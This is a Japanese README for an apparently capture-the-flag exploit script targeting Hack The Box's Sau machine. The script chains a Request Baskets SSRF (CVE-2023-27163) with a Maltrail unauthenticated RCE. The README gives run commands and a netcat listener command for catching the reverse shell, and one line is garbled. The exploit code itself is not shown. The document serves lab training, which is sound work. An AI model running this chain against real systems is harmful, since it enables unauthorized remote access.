
HTB Sau向け自動エクスプロイトチェーン — CVE-2023-27163 (SSRF) + Maltrail未認証RCE → リバースシェル
CVE-2023-27163(Request Baskets ≤ 1.2.1 のサーバーサイドリクエストフォージェリ)と Maltrail 0.53 の認証不要のリモートコード実行脆弱性を連鎖させ、リバースシェルを送信する Python エクスプロイトスクリプトです。Hack The Box の Sau マシン向けに設計されています。
このスクリプトは、ターゲットへの初期アクセスを獲得するために必要なエクスプロイト経路を自動化します:
python3 exploit.py <TARGET_URL> <LISTENER_IP> <LISTENER_PORT>
例:
python3 exploit.py http://10.10.11.224 10.10.14.6 4444
エクスプロイトを実行する前に、リバースシェルを受け取るために自分のマシンでリスナーを起動してください:
nc -lvnp <LISTENER_PORT>
例:
nc -lvnp 4444
| Parameter | Description |
|---|---|
TARGET_URL | ターゲットのベース URL(例:http://IP) |
LISTENER_IP | 攻撃マシンの IP |
LISTENER_PORT | リバースシェルを受け取るポート |
bucket_url)を抽出/ を削除してください(スクリプト内で自動処理されます)このプロジェクトは教育目的および Hack The Box などの許可された環境での使用を目的としています。適切な許可なしにシステムに対して使用しないでください。